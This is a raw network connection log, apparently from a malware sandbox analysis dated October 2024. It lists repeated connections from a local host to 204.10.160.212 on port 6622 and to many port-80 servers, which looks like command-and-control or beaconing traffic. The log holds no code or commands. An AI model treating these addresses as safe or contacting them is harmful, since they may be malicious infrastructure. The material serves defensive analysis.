                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.691778898 CEST5017680192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.697043896 CEST80501763.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.902390957 CEST662250175204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.902520895 CEST501756622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.902606010 CEST501756622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.907484055 CEST662250175204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.021620035 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.026662111 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.026740074 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.027127981 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.027148008 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.032747030 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.032843113 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.052479982 CEST805017818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.052666903 CEST5017880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.052877903 CEST805017818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.053952932 CEST5017880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.057761908 CEST805017818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.093195915 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.098423958 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.098747969 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.099745035 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.099756002 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.104605913 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.104815960 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.587872982 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.588195086 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.591124058 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.591193914 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.593241930 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.645842075 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.651582956 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.651650906 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.652514935 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.655478001 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.656610012 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.656686068 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.660342932 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.668971062 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.668987989 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.674876928 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.674947977 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.178560019 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.178895950 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.184715033 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.191977024 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.196182966 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.203437090 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.203505039 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.204447985 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.204468012 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.209912062 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.209924936 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381036043 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381072044 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381123066 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381373882 CEST5017980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.386908054 CEST805017918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.527846098 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.532834053 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.533335924 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.534482956 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.534482956 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.539307117 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.539493084 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.732907057 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.733243942 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.734004021 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.738979101 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.782572031 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.787576914 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.788566113 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.791023016 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.791167021 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.796391010 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.797045946 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.109249115 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.113325119 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.113325119 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.118386030 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.267083883 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.267460108 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.267574072 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.273957014 CEST5018580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.279174089 CEST805018544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.288791895 CEST5018680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.293714046 CEST805018618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294289112 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294428110 CEST5018680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294493914 CEST5018680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294522047 CEST5018680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294564962 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294862032 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.295068026 CEST5018480192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.299742937 CEST805018618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.299757004 CEST805018618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.299767017 CEST805018434.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.833039045 CEST501876622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.838053942 CEST662250187204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.838119984 CEST501876622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.842128038 CEST501876622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.847105980 CEST662250187204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.857445002 CEST5018880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.862900019 CEST805018847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.864747047 CEST5018880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.864852905 CEST5018880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.864913940 CEST5018880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.870110035 CEST805018847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.870598078 CEST805018847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.871831894 CEST805018618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.871850967 CEST805018618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.871860981 CEST805018618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.871922970 CEST5018680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.875444889 CEST5018680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.880956888 CEST805018618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.890218973 CEST5018980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.895528078 CEST805018918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.895597935 CEST5018980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.895834923 CEST5018980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.895854950 CEST5018980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.900840998 CEST805018918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.901557922 CEST805018918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.190599918 CEST805018847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.190860033 CEST5018880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.191031933 CEST805018847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.191093922 CEST5018880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.195774078 CEST805018847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.300761938 CEST662250187204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.300849915 CEST501876622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.300889015 CEST501876622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.308257103 CEST662250187204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.365669012 CEST805018918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.365823984 CEST5018980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.365901947 CEST805018918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.365958929 CEST5018980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.370990038 CEST805018918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.380945921 CEST5019080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.385838032 CEST8050190172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.385957956 CEST5019080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.386077881 CEST5019080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.386102915 CEST5019080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.391166925 CEST8050190172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.391724110 CEST8050190172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.895320892 CEST8050190172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.895400047 CEST5019080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.895461082 CEST5019080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.900342941 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.900510073 CEST8050190172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.905267954 CEST8050191172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.905411959 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.905728102 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.905783892 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.910937071 CEST8050191172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.910948038 CEST8050191172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.006355047 CEST501926622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.012068033 CEST662250192204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.012567043 CEST501926622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.018585920 CEST501926622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.026248932 CEST662250192204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.104099035 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.109338999 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110343933 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110486031 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110486031 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.116991997 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.117027998 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.393193960 CEST8050191172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.394009113 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.394009113 CEST5019180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.399171114 CEST8050191172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.411073923 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.416342020 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418668032 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418838978 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418860912 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.424196959 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.424545050 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.595979929 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.596321106 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.600339890 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.600404978 CEST5019380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.601412058 CEST80501933.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.145565033 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.145760059 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.146349907 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.369951010 CEST5019480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.374759912 CEST805019454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.426489115 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.426547050 CEST5006380192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.431332111 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.431699991 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.431762934 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.432379007 CEST805006385.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.432442904 CEST5006380192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436436892 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436584949 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436911106 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436966896 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.441807032 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.441865921 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.492223024 CEST662250192204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.494672060 CEST501926622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.494712114 CEST501926622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.499876022 CEST662250192204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.528292894 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.533371925 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.533442974 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.534096003 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.534111023 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.539124966 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.539135933 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050497055 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050640106 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050646067 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050702095 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.061795950 CEST5019580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.066843033 CEST805019544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.093079090 CEST5019780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.098175049 CEST805019734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.098773956 CEST5019780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.098825932 CEST5019780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.098870993 CEST5019780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.104021072 CEST805019734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.104130983 CEST805019734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.161762953 CEST501986622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.166734934 CEST662250198204.10.160.212192.168.2.4
